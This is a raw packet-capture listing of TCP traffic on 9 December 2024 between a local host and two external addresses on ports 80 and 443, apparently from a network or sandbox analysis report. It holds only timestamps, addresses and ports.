                                                                                                                                                                                                                                            Dec 9, 2024 21:09:24.131880045 CET44349899172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.259911060 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.260013103 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.260020018 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.260042906 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.260054111 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.260062933 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.260088921 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.260220051 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.260253906 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.260294914 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.260307074 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.260332108 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.260348082 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.260514021 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.260525942 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.260544062 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.260555029 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.260569096 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.260579109 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.344347000 CET44349899172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.344458103 CET49899443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.379548073 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.379597902 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.379684925 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.379720926 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.455559015 CET49899443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.455570936 CET44349899172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.455873966 CET44349899172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.468091011 CET49899443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.468425035 CET49899443192.168.2.6172.67.139.78
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.468430042 CET44349899172.67.139.78192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.501085043 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.501138926 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.501311064 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.501352072 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.505053997 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.505096912 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.505315065 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.505351067 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.512525082 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.512568951 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.515294075 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.515353918 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.515507936 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.515563011 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.523016930 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.523080111 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.523124933 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.523163080 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.530522108 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.530572891 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.530635118 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.530673027 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.538216114 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.538258076 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.538465977 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.538503885 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.545783997 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.545825005 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.545974016 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.546014071 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.553575039 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.553617001 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.553699970 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.553745985 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.561110973 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.561155081 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.561212063 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.561253071 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.569482088 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.569493055 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.569535971 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.609724998 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.609791040 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.620517969 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.620537996 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.620584011 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.620598078 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.696152925 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.696203947 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.696302891 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.696352005 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.699354887 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.699412107 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.699454069 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.699522018 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.705760002 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.705821037 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.705955982 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.706125021 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.711889029 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.711947918 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.711993933 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.712070942 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.718151093 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.718200922 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.718590975 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.718678951 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.724318027 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.724379063 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.725438118 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.725482941 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.730590105 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.730633020 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.730803967 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.730844021 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.736969948 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.737019062 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.737088919 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.737131119 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.743110895 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.743180990 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.743212938 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.743225098 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.749386072 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.749490023 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.749644041 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.749680996 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.755625963 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.755733013 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.755736113 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.755992889 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.759287119 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.759392023 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.759443045 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.759723902 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.762923956 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.762973070 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.763057947 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.763159990 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.766671896 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.766699076 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.766736031 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.766752958 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.770253897 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.770409107 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.770440102 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.770467043 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.774025917 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.774071932 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.774238110 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.774277925 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.777507067 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.777558088 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.777626991 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.777667046 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.781126022 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.781461954 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.781519890 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.785197973 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.785377979 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.785429955 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.788548946 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.788578987 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.788589001 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.790878057 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.792160034 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.792201996 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.815927982 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.816061974 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.816133976 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.817867041 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.818037033 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.818087101 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.821484089 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.826891899 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.885858059 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.885921955 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.885996103 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.887607098 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.887880087 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.887932062 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.891258001 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.891336918 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.891379118 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.894998074 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.895167112 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.895226002 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.898665905 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.898709059 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.898792028 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.898873091 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.902010918 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.902373075 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.902410030 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.905503988 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.905654907 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.905704975 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.908582926 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.908637047 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.908704996 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.910881996 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.911725998 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.911770105 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.912076950 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.912118912 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.914841890 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.914936066 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.914982080 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.917781115 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.917979956 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.918030977 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.920722961 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.920783043 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.920969009 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.922880888 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.923769951 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.923829079 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.923963070 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.923995972 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.926580906 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.926770926 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.926819086 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.929492950 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.929687023 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.929733992 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.932390928 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.932440996 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.932562113 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.934904099 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.935405970 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.935448885 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.935798883 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.935846090 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.938308954 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.938549042 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.938596010 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.941196918 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.941391945 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.941440105 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.944364071 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.944425106 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.944926977 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.946099043 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.946146011 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.946146965 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.946882963 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.948019981 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.948199987 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.948254108 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.950031996 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.950174093 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.950246096 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.951944113 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.951993942 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.952112913 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.952904940 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.993905067 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.994244099 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.994254112 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.994260073 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.994314909 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.996197939 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.996392012 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.996447086 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.998106956 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.998761892 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:25.998830080 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.000401974 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.000457048 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.000515938 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.000912905 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.002032995 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.006877899 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.077279091 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.077424049 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.077452898 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.077471972 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.078156948 CET8049898185.215.113.16192.168.2.6
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.078444958 CET4989880192.168.2.6185.215.113.16
                                                                                                                                                                                                                                            Dec 9, 2024 21:09:26.078980923 CET8049898185.215.113.16192.168.2.6
